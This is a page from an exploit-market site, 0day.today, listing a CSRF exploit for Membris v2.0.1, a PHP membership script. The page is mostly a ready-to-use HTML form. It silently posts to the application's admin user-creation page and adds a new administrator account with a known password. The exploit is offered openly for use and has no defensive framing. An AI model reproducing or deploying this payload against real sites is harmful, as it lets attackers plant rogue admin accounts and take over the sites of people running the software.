[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Membris v 2.0.1 CSRF Vulnerability (Add Admin)

Author
AtT4CKxT3rR0r1ST
Risk
[
Security Risk Low
]
0day-ID
0day-ID-18409
Category
web applications
Date add
01-06-2012
Platform
php
Membris v 2.0.1  CSRF Vulnerability (Add Admin)
====================================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://scripts.toocharger.com/fiches/scripts/membris/5258.htm
.:. Tested On Demo : http://demo.membris.fr/
####################################################################

===[ Exploit ]===

<form method="POST" name="form0" action="http://SITE/admin/ajouter-utilisateur.php">
<input type="hidden" name="identifiant" value="Admin"/>
<input type="hidden" name="email" value="F.Hack@w.cn"/>
<input type="hidden" name="mdp" value="123456"/>
<input type="hidden" name="rmdp" value="123456"/>
<input type="hidden" name="niveau" value="1"/>
<input type="hidden" name="etat" value="1"/>
<input type="hidden" name="prenom" value="Mohamad"/>
<input type="hidden" name="nom" value="Hussien"/>
<input type="hidden" name="lng" value="en"/>
<input type="hidden" name="site" value="http://1337day.com/"/>
<input type="hidden" name="gomail" value="1"/>
</form>
<form method="GET" name="form1" action="http://SITE/admin/utilisateurs.php?msg=ajouter">
<input type="hidden" name="name" value="value"/>
</form>

</body>
</html>

####################################################################



#  0day.today [2024-12-26]  #